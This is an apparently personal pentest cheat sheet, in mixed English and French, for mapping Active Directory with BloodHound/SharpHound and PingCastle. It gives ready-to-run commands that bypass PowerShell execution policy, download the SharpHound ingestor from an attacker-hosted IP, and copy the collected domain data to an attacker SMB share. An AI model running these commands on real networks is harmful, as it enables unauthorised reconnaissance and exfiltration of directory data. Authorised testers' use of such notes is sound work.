Domain Mapping

BloodHound

Tips

# Right Click
# Get information about the node and also how to compromise the user / machine

# Owned
# Can be usefull during an internal pentest to note where you are
# Nodes will be tagged with a skull
# It's then possible to ask the shortest path to a node from the owned ones

# Filters
# Can be usefull

# Shortcuts
# CTRL --> Change node display
# CTRL+SHIFT+I --> Developper Tools
# CTRL+R --> Reload display

# Still possible to edit data to set what you want
# If you don't have access to a domain machine but have creds
# You can run from host
runas /netonly /user:FQDN.local\USER powershell
# Then
Import-Module Sharphound.ps1
Invoke-BloodHound -ZipFileName 'PATH/TO/ZIP.zip' -JsonFolder 'PATH/TO/folderas above' -CollectionMethod All -Domain  FQDN
Setup
# Bloodhound directement depuis la machine cible
# apt-get install bloodhound

# Setup
$ sudo neo4j console
...
... http://localhost:7474
user/pass = neo4j/neo4j

# Start
$ bloodhound
URL : bolt://127.0.0.1:7687
Target Collection
# On the target, drop the Sharphound ingestor
# You can drop it through shared folder or by download
https://github.com/BloodHoundAD/BloodHound
https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1

# Powershell
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All

# Default : Domains, Computers, Users, Groups
# All : Domains, Computers, Users, Groups, OUs, GPOs

# Exe
# You may need some .NET packages
C:\> SharpHound.exe
C:\> SharpHound.exe — CollectionMethod SessionLoop — MaxLoopTime 1h
C:\> SharpHound.exe — CollectionMethod ACL

.\SharpHound.exe --domain UCA.LAN --domaincontroller 192.168.30.10 --ldapusername "die-hardman" --ldappassword "maskonyourface" --CollectionMethod Group,LocalGroup,GPOLocalGroup,Session,LoggedOn,ObjectProps,ACL,ComputerOnly,Trusts,Default,RDP,DCOM,DCOnly
# Python based ingestor (for remote work)
https://github.com/fox-it/BloodHound.py

# Collection Methods : Default, Group, LocalAdmin, RDP, DCOM, Session, Acl, Trusts, LoggedOn, ObjectProps, All (except LoggedOn)
bloodhound-python -u USERNAME -p PASSWORD -d DOMAIN --collectionmethod All
# Drop BloodHound ingestor and get results back through SMB Server
python -m SimpleHTTPServer
Invoke-WebRequest -Uri “http://10.10.16.112:8000/SharpHound.ps1” -OutFile “.\SharpHound.ps1”

Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All

# Since Windows 10 you can't do anonymous smbserver anymore
sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"

net use Z: \\192.168.30.130\SDFR /user:peon peon
net use Z: /delete /y

copy C:\Users\xxx\Documents\20191104044628_BloodHound.zip \\10.10.16.112\TESTLOL\file.zip

Analysis

# Results will be zipped
# Get back zip, unzip it and upload files into bloodhound
# Custom queries
https://github.com/hausec/Bloodhound-Custom-Queries

# Replace or update the following file
C:\Users[USERNAME]\AppData\Roaming\BloodHound\customqueries.json


PingCastle

Lien : https://www.pingcastle.com/PingCastleFiles/PingCastle_2.4.3.0.zip
> Drop exe on the target
> Run Pingcastle.exe (mode interactif par défaut)
> Healthcare (enter) et domaine (*)

> Mode CLI :
> PingCastle --healthcheck --server mydomain.com
> PingCastle --carto


ADACLScanner

TODO